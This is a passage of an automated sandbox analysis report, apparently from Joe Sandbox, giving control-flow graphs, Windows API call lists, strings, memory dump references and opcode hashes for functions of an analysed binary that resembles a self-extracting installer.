865->857 870 7ff6ef6d63d1-7ff6ef6d63d8 865->870 866->838 868->848 868->869 869->848 870->857 873 7ff6ef6d63da-7ff6ef6d63df 870->873 873->857 874 7ff6ef6d63e1-7ff6ef6d63e9 873->874 874->848 874->857
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3432403771-2852464175
                                                                                                                                            • Opcode ID: 5825db9d11c9886576c81ba2324aa96053477cb978010f585f34799421a7af15
                                                                                                                                            • Instruction ID: 2aadfd7a6ce091fc45a571aa88d0e3490d941ad5ba2d14804326a3331f5d40c6
                                                                                                                                            • Opcode Fuzzy Hash: 5825db9d11c9886576c81ba2324aa96053477cb978010f585f34799421a7af15
                                                                                                                                            • Instruction Fuzzy Hash: 0B914733A05B128BEB40DF65D8407A833A9BB08B88F154539DE0D87B54EF7BE545DB09

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 879 7ff6ef6c1adc-7ff6ef6c1b2a call 7ff6ef6d6bd0 call 7ff6ef6d9068 884 7ff6ef6c1b67-7ff6ef6c1b77 call 7ff6ef6c4ce8 879->884 885 7ff6ef6c1b2c-7ff6ef6c1b65 GetModuleFileNameW call 7ff6ef6bff38 call 7ff6ef6c4ca4 879->885 888 7ff6ef6c1b7c-7ff6ef6c1b9e call 7ff6ef6bc564 call 7ff6ef6bc990 884->888 885->888 896 7ff6ef6c2425-7ff6ef6c2429 call 7ff6ef6bc5ac 888->896 897 7ff6ef6c1ba4-7ff6ef6c1bb2 888->897 901 7ff6ef6c242e-7ff6ef6c2457 call 7ff6ef6d6760 896->901 899 7ff6ef6c1bb4-7ff6ef6c1bd4 call 7ff6ef6c24a4 * 2 897->899 900 7ff6ef6c1bd6-7ff6ef6c1c0e call 7ff6ef6de8d0 * 2 897->900 899->900 912 7ff6ef6c1c11-7ff6ef6c1c14 900->912 913 7ff6ef6c1d44-7ff6ef6c1d63 call 7ff6ef6bceb0 call 7ff6ef6de6ec 912->913 914 7ff6ef6c1c1a-7ff6ef6c1c4d call 7ff6ef6bcfc0 call 7ff6ef6bccf0 912->914 913->896 923 7ff6ef6c1d69-7ff6ef6c1d87 call 7ff6ef6bccf0 913->923 924 7ff6ef6c1d15-7ff6ef6c1d26 call 7ff6ef6bceb0 914->924 925 7ff6ef6c1c53-7ff6ef6c1c5b 914->925 937 7ff6ef6c1d93-7ff6ef6c1da6 call 7ff6ef6de6ec 923->937 938 7ff6ef6c1d89-7ff6ef6c1d91 923->938 934 7ff6ef6c1d2b-7ff6ef6c1d35 924->934 927 7ff6ef6c1c5d-7ff6ef6c1c65 925->927 928 7ff6ef6c1c8b-7ff6ef6c1c94 925->928 927->928 931 7ff6ef6c1c67-7ff6ef6c1c85 call 7ff6ef6deca0 927->931 932 7ff6ef6c1cc6-7ff6ef6c1cce 928->932 933 7ff6ef6c1c96-7ff6ef6c1ca5 928->933 931->928 952 7ff6ef6c1d11 931->952 935 7ff6ef6c1cd0-7ff6ef6c1cd8 932->935 936 7ff6ef6c1cfe-7ff6ef6c1d05 932->936 933->932 940 7ff6ef6c1ca7-7ff6ef6c1cae 933->940 934->912 941 7ff6ef6c1d3b-7ff6ef6c1d3e 934->941 935->936 942 7ff6ef6c1cda-7ff6ef6c1cf8 call 7ff6ef6deca0 935->942 936->924 943 7ff6ef6c1d07 936->943 937->896 956 7ff6ef6c1dac-7ff6ef6c1dc7 call 7ff6ef6c66a4 call 7ff6ef6dbe38 937->956 944 7ff6ef6c1dca-7ff6ef6c1e0c call 7ff6ef6c4c78 call 7ff6ef6de6ec 938->944 940->932 947 7ff6ef6c1cb0-7ff6ef6c1cc4 call 7ff6ef6de610 940->947 941->896 941->913 942->896 942->936 943->925 962 7ff6ef6c1e0e-7ff6ef6c1e16 call 7ff6ef6dbe38 944->962 963 7ff6ef6c1e1b-7ff6ef6c1e38 944->963 947->932 957 7ff6ef6c1d0c 947->957 952->924 956->944 957->952 962->896 966 7ff6ef6c1e3e-7ff6ef6c1e4b 963->966 967 7ff6ef6c22e6-7ff6ef6c22e9 963->967 971 7ff6ef6c1e51-7ff6ef6c1e57 966->971 972 7ff6ef6c2174-7ff6ef6c217f 966->972 969 7ff6ef6c22f1-7ff6ef6c22f9 967->969 973 7ff6ef6c22ff-7ff6ef6c231a call 7ff6ef6e1430 969->973 974 7ff6ef6c23a4-7ff6ef6c23bc call 7ff6ef6dbe38 * 2 969->974 975 7ff6ef6c1e65-7ff6ef6c1e6b 971->975 976 7ff6ef6c1e59-7ff6ef6c1e5f 971->976 977 7ff6ef6c2185-7ff6ef6c218f 972->977 978 7ff6ef6c22eb 972->978 999 7ff6ef6c235c-7ff6ef6c239f call 7ff6ef6dfc34 call 7ff6ef6c2460 973->999 1000 7ff6ef6c231c-7ff6ef6c2324 973->1000 1022 7ff6ef6c23e1-7ff6ef6c2424 call 7ff6ef6de8d0 * 2 974->1022 1023 7ff6ef6c23be-7ff6ef6c23df call 7ff6ef6c24a4 * 2 974->1023 981 7ff6ef6c1e71-7ff6ef6c1eb1 975->981 982 7ff6ef6c2038-7ff6ef6c2048 call 7ff6ef6c4ae4 975->982 976->972 976->975 983 7ff6ef6c2191-7ff6ef6c2197 977->983 984 7ff6ef6c21ef-7ff6ef6c21f3 977->984 978->969 990 7ff6ef6c1eb8-7ff6ef6c1eda call 7ff6ef6dbb78 call 7ff6ef6de610 981->990 1010 7ff6ef6c215e-7ff6ef6c2170 982->1010 1011 7ff6ef6c204e-7ff6ef6c207c call 7ff6ef6c4ce8 call 7ff6ef6de6ac 982->1011 991 7ff6ef6c1f2f-7ff6ef6c1f3a 983->991 992 7ff6ef6c219d-7ff6ef6c21a5 983->992 988 7ff6ef6c21f5-7ff6ef6c21f9 984->988 989 7ff6ef6c2213-7ff6ef6c2219 984->989 988->989 1002 7ff6ef6c21fb-7ff6ef6c2201 988->1002 993 7ff6ef6c221f-7ff6ef6c223b call 7ff6ef6e1430 989->993 994 7ff6ef6c22cd 989->994 1037 7ff6ef6c1edc-7ff6ef6c1eeb 990->1037 1038 7ff6ef6c1efa 990->1038 991->969 1001 7ff6ef6c1f40-7ff6ef6c1f49 991->1001 995 7ff6ef6c21a7-7ff6ef6c21ab 992->995 996 7ff6ef6c21db 992->996 1027 7ff6ef6c227d 993->1027 1028 7ff6ef6c223d-7ff6ef6c2245 993->1028 1006 7ff6ef6c22d3-7ff6ef6c22df 994->1006 1007 7ff6ef6c21d4-7ff6ef6c21d9 995->1007 1008 7ff6ef6c21ad-7ff6ef6c21b1 995->1008 1013 7ff6ef6c21e0-7ff6ef6c21e8 996->1013 999->974 1014 7ff6ef6c232a-7ff6ef6c232e 1000->1014 1001->966 1002->991 1015 7ff6ef6c2207-7ff6ef6c220e 1002->1015 1006->967 1007->1013 1018 7ff6ef6c21b3-7ff6ef6c21b7 1008->1018 1019 7ff6ef6c21cd-7ff6ef6c21d2 1008->1019 1010->972 1011->1010 1057 7ff6ef6c2082-7ff6ef6c2111 call 7ff6ef6c6948 call 7ff6ef6c4c78 call 7ff6ef6c4c1c call 7ff6ef6c4c78 call 7ff6ef6de6f4 1011->1057 1013->984 1024 7ff6ef6c2330-7ff6ef6c2334 1014->1024 1025 7ff6ef6c2336-7ff6ef6c2341 1014->1025 1029 7ff6ef6c21b9-7ff6ef6c21bd 1018->1029 1030 7ff6ef6c21c6-7ff6ef6c21cb 1018->1030 1019->1013 1022->896 1023->1022 1024->1025 1034 7ff6ef6c2343-7ff6ef6c234c 1024->1034 1025->1014 1025->1034 1042 7ff6ef6c2283-7ff6ef6c22cb call 7ff6ef6dfc34 call 7ff6ef6c2460 1027->1042 1039 7ff6ef6c224a-7ff6ef6c224e 1028->1039 1029->1015 1040 7ff6ef6c21bf-7ff6ef6c21c4 1029->1040 1030->1013 1034->999 1044 7ff6ef6c234e-7ff6ef6c2354 1034->1044 1037->1038 1046 7ff6ef6c1eed-7ff6ef6c1ef8 1037->1046 1049 7ff6ef6c1efe-7ff6ef6c1f09 1038->1049 1047 7ff6ef6c2250-7ff6ef6c2253 1039->1047 1048 7ff6ef6c2255-7ff6ef6c2260 1039->1048 1040->1013 1042->1006 1044->999 1053 7ff6ef6c2356 1044->1053 1046->1049 1047->1048 1055 7ff6ef6c2262-7ff6ef6c226b 1047->1055 1048->1039 1048->1055 1049->990 1056 7ff6ef6c1f0b-7ff6ef6c1f12 1049->1056 1053->999 1055->1042 1060 7ff6ef6c226d-7ff6ef6c2273 1055->1060 1061 7ff6ef6c1f4e 1056->1061 1062 7ff6ef6c1f14-7ff6ef6c1f26 call 7ff6ef6c4c78 1056->1062 1095 7ff6ef6c2113-7ff6ef6c2123 1057->1095 1096 7ff6ef6c2127-7ff6ef6c213a 1057->1096 1060->1042 1065 7ff6ef6c2275-7ff6ef6c227b 1060->1065 1061->982 1068 7ff6ef6c1f54 1061->1068 1070 7ff6ef6c1f2b 1062->1070 1065->1042 1072 7ff6ef6c1f59-7ff6ef6c1f65 1068->1072 1070->991 1073 7ff6ef6c1f67-7ff6ef6c1f6a 1072->1073 1074 7ff6ef6c1f6c-7ff6ef6c1f6f 1072->1074 1073->1074 1076 7ff6ef6c1f71-7ff6ef6c1f78 1073->1076 1074->1072 1078 7ff6ef6c1fa1-7ff6ef6c1faf 1076->1078 1079 7ff6ef6c1f7a-7ff6ef6c1f84 1076->1079 1083 7ff6ef6c1fb5-7ff6ef6c1fe0 call 7ff6ef6c6948 1078->1083 1084 7ff6ef6c2458-7ff6ef6c245f call 7ff6ef6d69a4 1078->1084 1082 7ff6ef6c1f87-7ff6ef6c1f8b 1079->1082 1082->1078 1086 7ff6ef6c1f8d-7ff6ef6c1f9f 1082->1086 1093 7ff6ef6c1fe2-7ff6ef6c2001 call 7ff6ef6de4a0 1083->1093 1094 7ff6ef6c2006-7ff6ef6c2033 call 7ff6ef6c28f0 1083->1094 1086->1078 1086->1082 1093->1070 1094->982 1095->1096 1099 7ff6ef6c2140-7ff6ef6c2146 1096->1099 1102 7ff6ef6c214f-7ff6ef6c2152 1099->1102 1103 7ff6ef6c2148-7ff6ef6c214d 1099->1103 1102->1099 1103->1102 1104 7ff6ef6c2154 1103->1104 1104->1010
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF6EF6C1ABA), ref: 00007FF6EF6C1B3B
                                                                                                                                              • Part of subcall function 00007FF6EF6C66A4: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6EF6BF60B,?,00000001,?,00007FF6EF6C6676), ref: 00007FF6EF6C66D1
                                                                                                                                            • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C202E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharFileModuleMultiNameWide_snwprintf
                                                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                                                            • API String ID: 2679931996-2291855099
                                                                                                                                            • Opcode ID: 5591824866574204440d77b796e6eefe9961957d05c33bfa7f6b11432d841042
                                                                                                                                            • Instruction ID: 97659d09149014f335b9653f2fa41a2cb831e591dd89eb3d355a4b9e5c4fdeb2
                                                                                                                                            • Opcode Fuzzy Hash: 5591824866574204440d77b796e6eefe9961957d05c33bfa7f6b11432d841042
                                                                                                                                            • Instruction Fuzzy Hash: 3E428023A1868297EF20DF15C4447F92369FF54784F804132DA8DCBA95EF2EE645E34A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1130 7ff6ef6d4944-7ff6ef6d4989 call 7ff6ef6d6bd0 1133 7ff6ef6d4bd2-7ff6ef6d4bf7 call 7ff6ef6d6760 1130->1133 1134 7ff6ef6d498f-7ff6ef6d499d call 7ff6ef6dbb78 1130->1134 1134->1133 1139 7ff6ef6d49a3-7ff6ef6d49ed call 7ff6ef6d7ac0 1134->1139 1142 7ff6ef6d4a3e 1139->1142 1143 7ff6ef6d49ef 1139->1143 1144 7ff6ef6d4a43-7ff6ef6d4a46 1142->1144 1145 7ff6ef6d49f4-7ff6ef6d49f8 1143->1145 1146 7ff6ef6d4a4e-7ff6ef6d4a51 1144->1146 1147 7ff6ef6d4a48-7ff6ef6d4a4c 1144->1147 1148 7ff6ef6d4a15-7ff6ef6d4a22 1145->1148 1149 7ff6ef6d49fa 1145->1149 1152 7ff6ef6d4a6b-7ff6ef6d4a7d call 7ff6ef6bf3a0 1146->1152 1153 7ff6ef6d4a53-7ff6ef6d4a66 1146->1153 1147->1146 1147->1152 1150 7ff6ef6d4bf8 1148->1150 1151 7ff6ef6d4a28-7ff6ef6d4a2c 1148->1151 1154 7ff6ef6d4a02-7ff6ef6d4a0c 1149->1154 1156 7ff6ef6d4bfd-7ff6ef6d4c02 1150->1156 1155 7ff6ef6d4a32-7ff6ef6d4a3c 1151->1155 1151->1156 1162 7ff6ef6d4aa2-7ff6ef6d4aae call 7ff6ef6bd48c 1152->1162 1163 7ff6ef6d4a7f-7ff6ef6d4a9d call 7ff6ef6c6b34 1152->1163 1153->1152 1158 7ff6ef6d4a0e 1154->1158 1159 7ff6ef6d49fc-7ff6ef6d4a00 1154->1159 1155->1142 1155->1145 1156->1144 1158->1148 1159->1154 1161 7ff6ef6d4a10 1159->1161 1161->1148 1168 7ff6ef6d4ab0-7ff6ef6d4ac8 call 7ff6ef6bf08c 1162->1168 1169 7ff6ef6d4acd-7ff6ef6d4ada ShellExecuteExW 1162->1169 1163->1162 1168->1169 1169->1133 1171 7ff6ef6d4ae0-7ff6ef6d4aea 1169->1171 1173 7ff6ef6d4afa-7ff6ef6d4afd 1171->1173 1174 7ff6ef6d4aec-7ff6ef6d4aef 1171->1174 1176 7ff6ef6d4aff-7ff6ef6d4b0a IsWindowVisible 1173->1176 1177 7ff6ef6d4b1a-7ff6ef6d4b2d WaitForInputIdle call 7ff6ef6d4ef4 1173->1177 1174->1173 1175 7ff6ef6d4af1-7ff6ef6d4af8 1174->1175 1175->1173 1178 7ff6ef6d4b6f-7ff6ef6d4b7c CloseHandle 1175->1178 1176->1177 1179 7ff6ef6d4b0c-7ff6ef6d4b17 ShowWindow 1176->1179 1183 7ff6ef6d4b32-7ff6ef6d4b39 1177->1183 1181 7ff6ef6d4b7e-7ff6ef6d4b8f call 7ff6ef6c6b34 1178->1181 1182 7ff6ef6d4b91-7ff6ef6d4b98 1178->1182 1179->1177 1181->1182 1185 7ff6ef6d4bba-7ff6ef6d4bbd 1181->1185 1182->1185 1186 7ff6ef6d4b9a-7ff6ef6d4b9d 1182->1186 1183->1178 1187 7ff6ef6d4b3b-7ff6ef6d4b3e 1183->1187 1185->1133 1190 7ff6ef6d4bbf-7ff6ef6d4bc2 1185->1190 1186->1185 1189 7ff6ef6d4b9f-7ff6ef6d4bb4 1186->1189 1187->1178 1191 7ff6ef6d4b40-7ff6ef6d4b51 GetExitCodeProcess 1187->1191 1189->1185 1190->1133 1192 7ff6ef6d4bc4-7ff6ef6d4bcc ShowWindow 1190->1192 1191->1178 1193 7ff6ef6d4b53-7ff6ef6d4b69 1191->1193 1192->1133 1193->1178
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait
                                                                                                                                            • String ID: .exe$.inf$Install$p
                                                                                                                                            • API String ID: 3163361234-3607691742
                                                                                                                                            • Opcode ID: d36a91afd6d15a032926df9198ee9a1ea810291e456789a04b998a5fb47a0abd
                                                                                                                                            • Instruction ID: 4ad7b4a401e8ad2da3036452d6c9d8d2c0669cd3c29e1c8f5afa305f8a03ddca
                                                                                                                                            • Opcode Fuzzy Hash: d36a91afd6d15a032926df9198ee9a1ea810291e456789a04b998a5fb47a0abd
                                                                                                                                            • Instruction Fuzzy Hash: B671B223A0964247EB64AF15E8503B933A8EF94744F648035D94EC7698DF3FE854DB0B

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3569833718-0
                                                                                                                                            • Opcode ID: 1d99383e1aec24e11e64b0f68f413c99e342f319a1008010917df5fcfdef6405
                                                                                                                                            • Instruction ID: 406f19a32f28bacdec5072fe2377a3f94956c4b59c9865beaceb5d11aac4fac3
                                                                                                                                            • Opcode Fuzzy Hash: 1d99383e1aec24e11e64b0f68f413c99e342f319a1008010917df5fcfdef6405
                                                                                                                                            • Instruction Fuzzy Hash: 8041E276B186868BFB108F61FC10BA927A1EB89B88F501131DD0A47B89CF7FD515CB05

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1227 7ff6ef6db78c-7ff6ef6db7ca 1228 7ff6ef6db7d0-7ff6ef6db7d3 1227->1228 1229 7ff6ef6db8bb 1227->1229 1230 7ff6ef6db8bd-7ff6ef6db8d9 1228->1230 1231 7ff6ef6db7d9 1228->1231 1229->1230 1232 7ff6ef6db7dc 1231->1232 1233 7ff6ef6db8b3 1232->1233 1234 7ff6ef6db7e2-7ff6ef6db7f1 1232->1234 1233->1229 1235 7ff6ef6db7f3-7ff6ef6db7f6 1234->1235 1236 7ff6ef6db7fe-7ff6ef6db81d LoadLibraryExW 1234->1236 1237 7ff6ef6db895-7ff6ef6db8a4 GetProcAddress 1235->1237 1238 7ff6ef6db7fc 1235->1238 1239 7ff6ef6db875-7ff6ef6db88a 1236->1239 1240 7ff6ef6db81f-7ff6ef6db828 GetLastError 1236->1240 1237->1233 1242 7ff6ef6db8a6-7ff6ef6db8b1 1237->1242 1243 7ff6ef6db869-7ff6ef6db870 1238->1243 1239->1237 1241 7ff6ef6db88c-7ff6ef6db88f FreeLibrary 1239->1241 1244 7ff6ef6db82a-7ff6ef6db83f call 7ff6ef6de610 1240->1244 1245 7ff6ef6db857-7ff6ef6db861 1240->1245 1241->1237 1242->1230 1243->1232 1244->1245 1248 7ff6ef6db841-7ff6ef6db855 LoadLibraryExW 1244->1248 1245->1243 1248->1239 1248->1245
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryExW.KERNELBASE(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB811
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB81F
                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB849
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB88F
                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB89B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                            • Opcode ID: c77115432eaf256f3fa09f936935641facb5cfb8b18f71be155dd5b9e2467c82
                                                                                                                                            • Instruction ID: 0742754686d3c9718f48748c8889190c9f657ae779631c0e59754534e61c1d15
                                                                                                                                            • Opcode Fuzzy Hash: c77115432eaf256f3fa09f936935641facb5cfb8b18f71be155dd5b9e2467c82
                                                                                                                                            • Instruction Fuzzy Hash: 6F31B423F1A64193FE15AB1698117B5239CBF48BA0F290535DD1D87398EF3EE4409B09

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                                                                                            • String ID: ]
                                                                                                                                            • API String ID: 3561356813-3352871620
                                                                                                                                            • Opcode ID: 7b4fa83177bad47321e5e6416dc10b225e33d74c417afac1c96156198ac862ae
                                                                                                                                            • Instruction ID: b82c6ff8f57762fd98b12742e74b6e0adb586de280f568e71af650b21a481a64
                                                                                                                                            • Opcode Fuzzy Hash: 7b4fa83177bad47321e5e6416dc10b225e33d74c417afac1c96156198ac862ae
                                                                                                                                            • Instruction Fuzzy Hash: 78119627B0D24243FE24AB11A6547796395AFC8BC4F190035DD4E87B89DE3FE804DB0A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
